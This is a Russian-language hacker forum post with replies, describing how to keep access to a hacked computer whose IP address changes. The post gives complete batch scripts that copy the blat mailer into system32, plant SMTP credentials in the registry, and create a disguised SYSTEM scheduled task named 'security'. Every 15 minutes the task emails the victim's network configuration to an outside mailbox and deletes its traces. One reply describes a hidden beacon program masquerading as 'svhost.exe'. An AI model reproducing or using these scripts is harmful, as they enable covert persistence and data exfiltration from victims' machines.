Власть над компом с непостоянным IP ]INTRO[ Допустим вы хекнули кемп с непостоянным ип, власть над ним терять естественно не хочется, но вы не находите другого выхода кроме как довольствоваться данным сеансом (а затем от злости format c: ). Что ж... ну вот и один из выходов о котором говорит эта статья. Данный способ отсылает вам на постовый ящик ipconfig /all от жертвы, но сначала он прописывается в windows/system32, за тем в назначенных заданиях и выполняется через определённый интервал времени - тут вознивает вопрос: "Почумы бы не отправлять просто при каждом включении машины?"... ну я тоже так сначала подумал и написал всё с использованием служб, но я забыл, что при включении компа инет мало у кого параллельно запускается)). В общем хватит рассказывать о том, о чём мы и так ниже прочитаем)). ]START[ Что нужно сделать для того, чтобы ipconfig /all отправлял свой отчёт на мыло? Ну для начала сохранить отчёт в файл, это: ipconfig /all > info.txt он сохранился в файл, за тем идёт команда (о ней ниже) и что-бы особо не светиться мы его удаляем: DEL info.txt Да, вот мы его создали, удалили, но вот пользы пока что мало... да и в назначенные задания добавлять батник создающий/удаляющий файл я тоже прикола не вижу)) Далее смотрим интересную тулзу по адресу http://blat.net , качаем full версию, распаковываем, кладём в общий каталог (где мы всё создаём), запускаем файл blat.exe через командную строку с параметрами: -install -server smtp.yandex.ru -f [email protected] -u [email protected] -pw cool_pass инсталим прогу так сказать smtp.yandex.ru - smtp сервак [email protected] - мыло с которого производится отправка [email protected] - логин (для яндекса адрес ящика) cool_pass - пароль к учётке потом топаем смотреть реестр по адресу: [HKEY_LOCAL_MACHINE\SOFTWARE\Public Domain\Blat] Как видите, логин и пас шифруются, экспортируем эту ветку, нам это добро пригодится ладно,теперь переходим к сборке самого пакета... В нашем каталоге должны быть 5 файлов: blat.dll blat.lib blat.exe condition.bat run.bat Первые 3 файла блатовские, а вторые 2 создаём пустыми. Заполняем run.bat: chcp 1251 copy /y "%~dp0\blat.exe" "%SYSTEMROOT%/system32\blat.exe" copy /y "%~dp0\blat.dll" "%SYSTEMROOT%/system32\blat.dll" copy /y "%~dp0\blat.lib" "%SYSTEMROOT%/system32\blat.lib" copy /y "%~dp0\condition.bat" "%SYSTEMROOT%/system32\condition.bat" ECHO Windows Registry Editor Version 5.00> info.reg ECHO [HKEY_LOCAL_MACHINE\SOFTWARE\Public Domain\Blat]>> info.reg ECHO "SMTP server"="smtp.yandex.ru">> info.reg ECHO "SMTP Port"="25">> info.reg ECHO "Try"="1">> info.reg ECHO "Login"="vebebbeb">> info.reg ECHO "Pwd"="ebebbbbr">> info.reg ECHO "Sender"="[email protected]">> info.reg regedit /s info.reg DEL info.reg schtasks /delete /tn "security" /f schtasks /create /tn "security" /sc minute /mo 15 /ru "NT AUTHORITY\SYSTEM" /tr %SYSTEMROOT%/system32\condition.bat chcp 1251 - кодировка copy /y "%~dp0\blat.exe" "%SYSTEMROOT%/system32\blat.exe" - копируем blat.exe в system32 copy /y "%~dp0\blat.dll" "%SYSTEMROOT%/system32\blat.dll" - копируем blat.dll в system32 copy /y "%~dp0\blat.lib" "%SYSTEMROOT%/system32\blat.lib" - копируем blat.lib в system32 copy /y "%~dp0\condition.bat" "%SYSTEMROOT%/system32\condition.bat" - копируем condition.bat в system32 тут пригодилась наша экспортированная ветка: echo - какбы показывает строку "> info.reg" перехватывает и записывает в info.reg (создавая его), ">> info.reg" дописывает в уже созданный. ECHO Windows Registry Editor Version 5.00> info.reg ECHO [HKEY_LOCAL_MACHINE\SOFTWARE\Public Domain\Blat]>> info.reg ECHO "SMTP server"="smtp.yandex.ru">> info.reg ECHO "SMTP Port"="25">> info.reg ECHO "Try"="1">> info.reg ECHO "Login"="vebebbeb">> info.reg ECHO "Pwd"="ebebbbbr">> info.reg ECHO "Sender"="[email protected]">> info.reg regedit /s info.reg - запускает свежевыжатый файл DEL info.reg - удаляет файл за ненадобновтью schtasks /delete /tn "security" /f - удаляет запланированное задание если такое имеется. Естественно 99% что его не будет, но это пригодится вам при проверке данной шняги, чтобы вручную не удалять. schtasks /create /tn "security" /sc minute /mo 15 /ru "NT AUTHORITY\SYSTEM" /tr %SYSTEMROOT%/system32\condition.bat - создаёт запланированное задание, которое запускает файл condition.bat каждые 15 минут от иени системы. Теперь сам condition.bat (очень много кода): chcp 1251 ipconfig /all > info.txt blat.exe info.txt -to [email protected] -subject IPconfig DEL info.txt chcp 1251 - по привычке) ipconfig /all > info.txt - ну вот создали info.txt - берём файл [email protected] - отправляем админу mail.ru (можно изменить этот хтрожопый код, чтобы отправляло вам) IPconfig - тема письма blat.exe info.txt -to [email protected] -subject IPconfig DEL info.txt - удаляем файл Ну вот вроди бы и всё, теперь запускаем run.bat By Ru][eeZ (Йа) Спасибо за помощь Remb0, SpangeBoB +[извиняюсь, если что-то забыл] (ставим им плюсы в репу!)
Ну да, много знаний не надо, всего 3 части для статьи: 1) что-то скопировать, создать 2) поиграться с ключами regedit 3) отосласть файл куда-то/приконектиться Третья статья будет о том как через батник запустить винамп на компе жертвы? А что такое непостоянный айпи? Это что-то типа "нетрадиционный"?
Статья нормальная , специально для тех (для школьников) кто всё время в поиске кого нить хакнуть , пусть хоть что нибудь читают и может хоть что-нибудь у них будет откладываться в голове , если конечно они будут не просто копипастить , всё что он написал выше !
название темы реально улыбнула напомнило про мультик Пинки и Брэйн : -Ru}{eeZ, а что мы будем делать сегодня вечером? -Как всегда, мой друг. Попробуем захватить власть над компом с непостоянным айпи а по теме: статья нормальная и имеет право на жиснь
есть же тем а про батники.... не легче это все в одну обьеденить??? ________________________ Шестисотый пост =\\\\
Статья, на самом деле хорошая, но удивляет, почему, на этом форуме, больше статей про ПРОГРАММИРОВАНИЕ на батниках, а не других языках. Может быть потому-что знающие люди вместо того чтобы писать статьи, кусают программистов на батниках. Цитаты Власть над компом на батниках. Лагерь солнышко рулит. 8А супер.
Насчет того как узнавать непостоянный ИП, у меня была такая нужда и я поступил таким вариантом: Создал мини сниффер на веб хостинге, ссылка, при обращении к которой записывался в тхт файл ип обративщейся машины. Затем написал на Delphi программу, которая запускалась без никаких признаков "жизни" (ее было только видно в процессах под именем: svhost.exe, оставалось только угадать какой именно ), ета программа переходила на сайт каждые N минут. Оставалось только добавить ее на автозапуск...
Когда-то на ачате были статьи, которые хотелось читать. Жаль, у меня мозгов мало, чтоб свою написать.